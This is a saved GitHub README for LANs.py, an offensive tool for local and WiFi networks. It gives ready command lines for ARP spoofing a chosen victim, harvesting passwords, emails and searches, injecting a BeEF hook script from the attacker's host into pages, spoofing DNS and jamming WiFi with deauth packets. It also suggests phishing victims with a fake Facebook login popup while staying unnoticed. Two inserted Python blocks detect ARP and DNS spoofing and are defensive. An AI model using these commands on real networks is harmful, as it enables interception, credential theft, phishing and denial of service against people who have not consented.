4/11/2015

DanMcInerney/LANs.py GitHub

DanMcInerney / LANs.py

Inject code, jam wifi, and spy on wifi users
If you have any issues running this script I'd suggest checking out MITMf which does all the same things + more. Eventually this script needs to be rewritten with net-creds as the engine.

LANs.py
Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.

Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all the most interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
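
From the monitoring side, the per-host ARP poisoning described above shows up as an IP address whose MAC binding changes and as one MAC answering for several IPs. The following is an added detection example, not code from LANs.py; the MAC addresses, the router address 192.168.0.1 and the trust-on-first-use baseline are assumptions made for the illustration.

```python
import struct

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))
def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))

def build_arp_reply(src_mac, src_ip, dst_mac, dst_ip):
    """Build an in-memory Ethernet + ARP 'is-at' frame for the constructed sample."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    return eth + arp + mac_bytes(src_mac) + ip_bytes(src_ip) + mac_bytes(dst_mac) + ip_bytes(dst_ip)

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip), or None if not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, frame[22:28].hex(":"), ".".join(str(b) for b in frame[28:32])

def detect_poisoning(frames):
    """Flag IPs whose MAC changes and MACs that claim more than one IP."""
    baseline, claimed, rebinds = {}, {}, []
    for number, frame in enumerate(frames, 1):
        parsed = parse_arp(frame)
        if parsed is None or parsed[2] == "0.0.0.0":  # skip non-ARP and ARP probes
            continue
        _, mac, ip = parsed
        first_seen = baseline.setdefault(ip, mac)  # assumption: first binding is genuine
        if mac != first_seen:
            rebinds.append((number, ip, first_seen, mac))
        claimed.setdefault(mac, set()).add(ip)
    multi = {m: sorted(ips) for m, ips in claimed.items() if len(ips) > 1}
    return rebinds, multi

# Constructed sample: router .1 is an assumed address; .5 and .10 follow the README.
ROUTER, HOST5, HOST10 = "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:05", "aa:aa:aa:aa:aa:10"
SAMPLE = [
    build_arp_reply(ROUTER, "192.168.0.1", HOST10, "192.168.0.10"),
    build_arp_reply(HOST10, "192.168.0.10", ROUTER, "192.168.0.1"),
    build_arp_reply(HOST5, "192.168.0.5", ROUTER, "192.168.0.1"),
    build_arp_reply(HOST5, "192.168.0.1", HOST10, "192.168.0.10"),  # router IP, wrong MAC
    build_arp_reply(HOST5, "192.168.0.10", ROUTER, "192.168.0.1"),  # victim IP, wrong MAC
]

if __name__ == "__main__":
    print(detect_poisoning(SAMPLE))
```

A legitimate DHCP reassignment or NIC replacement also produces a rebind, so alerts are best correlated with the second signal (one MAC holding the gateway's IP plus another host's).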

Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.

Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target.

Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.

All options:
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
               [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
               [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
               [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
               [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
               [--directedonly] [--accesspoint ACCESSPOINT]

https://github.com/DanMcInerney/LANs.py

Usage
Common usage:
python LANs.py -u -p

Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.

Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png

Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.

Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10

-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning

HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js

Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.

python LANs.py -c '<title>Owned.</title>'

Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'

Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10

To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

DNS spoofing
python LANs.py -a -r 80.87.128.67

python LANs.py -dns eff.org

Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
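
Both redirect behaviours described above leave a recognisable pattern in a client's DNS answers: a public name resolving to a LAN address (the default redirect to the attacker's IP), or many unrelated domains all resolving to one address (the spoof-everything mode). The following is an added detection example, not part of LANs.py; the log format, the internal suffix list, the last-two-labels domain grouping and the threshold of 3 are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of observed answers, one "<query name> <A record>" per line.
SAMPLE_LOG = """\
eff.org 192.168.0.5
www.eff.org 192.168.0.5
printer.lan 192.168.0.20
news.example.org 80.87.128.67
mail.example.net 80.87.128.67
shop.example.com 80.87.128.67
docs.example.com 93.184.216.34
"""

def analyse(log_text, internal_suffixes=(".lan", ".local"), fanin_threshold=3):
    """Return (public names answered with private IPs, IPs shared by many domains)."""
    private_hits, domains_by_ip = [], defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        name, answer = parts[0].lower().rstrip("."), parts[1]
        try:
            addr = ipaddress.ip_address(answer)
        except ValueError:
            continue  # not an address record we understand
        # A name outside the internal zones should not resolve into RFC 1918 space.
        if addr.is_private and not name.endswith(internal_suffixes):
            private_hits.append((name, answer))
        # Naive grouping by the last two labels (no public suffix list).
        domains_by_ip[answer].add(".".join(name.split(".")[-2:]))
    fanin = {ip: sorted(doms) for ip, doms in domains_by_ip.items()
             if len(doms) >= fanin_threshold}
    return private_hits, fanin

if __name__ == "__main__":
    hits, fanin = analyse(SAMPLE_LOG)
    print("public names on private IPs:", hits)
    print("unrelated domains sharing one IP:", fanin)
```

Shared hosting and CDNs also map many domains to one address, so the fan-in result is a lead to check against a trusted resolver rather than a verdict.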

Most aggressive usage:

python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 1

Jam all WiFi networks:
python LANs.py --jam

Jam just one access point (router)
python Lans.py --jam --accesspoint 01:MA:C0:AD:DY

All options:
Normal Usage:
-b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
-c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
-d: open an xterm with driftnet to see all images they view
-dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
-a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
-r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
-i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0
-ip: target this IP address
-n: performs a quick nmap scan of the target
-na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
-pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
-rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
-rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
-v: show verbose URLs which do not truncate at 150 characters like -u
--jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary

Wifi Jamming:
-s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
-ch CHANNEL: Limit wifijammer to single channel
-m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
-no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
-t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
--packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
--directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
--accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.

Cleanup
Upon receiving a Ctrl-C:
Turns off IP forwarding
Flushes iptables firewall
Individually restores the router and victim's ARP tables

Technical details
This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.

Injecting code undetected is a dicey game; if a minor thing goes wrong or the server the victim is requesting data from performs things in a unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just wait for them to browse a few other pages. The goal is to be unnoticeable. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook popup saying the user's authentication expired and to re-enter their credentials.

danmcinerney.org